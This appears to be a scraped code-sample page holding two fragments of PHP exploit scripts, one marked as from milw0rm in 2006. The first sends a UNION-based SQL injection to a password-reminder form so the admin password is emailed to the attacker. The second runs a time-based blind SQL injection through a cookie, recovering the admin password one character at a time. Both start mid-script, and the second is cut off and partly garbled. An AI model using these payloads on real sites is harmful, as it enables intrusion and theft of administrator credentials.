Beispiel #1
0
        $port = str_replace("-p", "", $argv[$i]);
    }
    if ($temp == "-P") {
        $proxy = str_replace("-P", "", $argv[$i]);
    }
}
if ($proxy != '') {
    $p = "http://" . $host . ":" . $port . $path;
} else {
    $p = $path;
}
$sql = "'UNION SELECT id,1,CONCAT('this is the real password (encrypted with md5()";
$sql .= ",crypt() or in plain text): ',password),password,name,title,'" . $your_email;
$sql .= "',null,'','','','',null,1,'2006-03-27 20:48',0,'administration/admin.php',";
$sql .= "'','',null FROM members mem WHERE id=1/*";
$sql = urlencode($sql);
$data = "loginForm=" . $sql;
$packet = "POST " . $p . "general/sendpassword.php?action=send HTTP/1.0\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
$packet .= $data;
#debug
echo quick_dump($packet);
sendpacketii($packet);
echo "Now check your mailbox...";
?>

# milw0rm.com [2006-03-28]
Beispiel #2
0
$admin = str_replace(chr(0), "", $admin);
echo "admin -> " . $admin . "\r\n";
$password = "";
$j = 1;
while (!strstr($password, chr(0))) {
    for ($i = 0; $i <= 255; $i++) {
        $starttime = time();
        echo "starttime -> " . $starttime . "\r\n";
        $sql = "99999 UNION SELECT IF((ASCII(SUBSTRING(password," . $j . ",1))=" . $i . ") & 1, benchmark(50000000,CHAR(0)),0) FROM " . $prefix . "users WHERE username="******" ", "/**/", $sql);
        $sql = urlencode($sql);
        $packet = "GET " . $p . "index.php?shard=blog&action=proc_reply HTTP/1.0\r\n";
        $packet .= "Host: " . $host . "\r\n";
        $packet .= "Cookie: ID=" . $sql . ";\r\n";
        $packet .= "Connection: Close\r\n\r\n";
        echo quick_dump($packet) . "\r\n";
        sendpacketii($packet);
        $endtime = time();
        echo "endtime -> " . $endtime . "\r\n";
        $difftime = $endtime - $starttime;
        echo "difftime -> " . $difftime . "\r\n";
        if ($difftime > 5) {
            $password .= chr($i);
            echo "password -> " . $password . "[???]\r\n";
            sleep(2);
            break;
        }
        if ($i == 255) {
            die("Exploit failed...we have an admin user in 'permissiongroups' table, but for some reason there is not a '" . $admin . "' user in 'users' one...");
        }
    }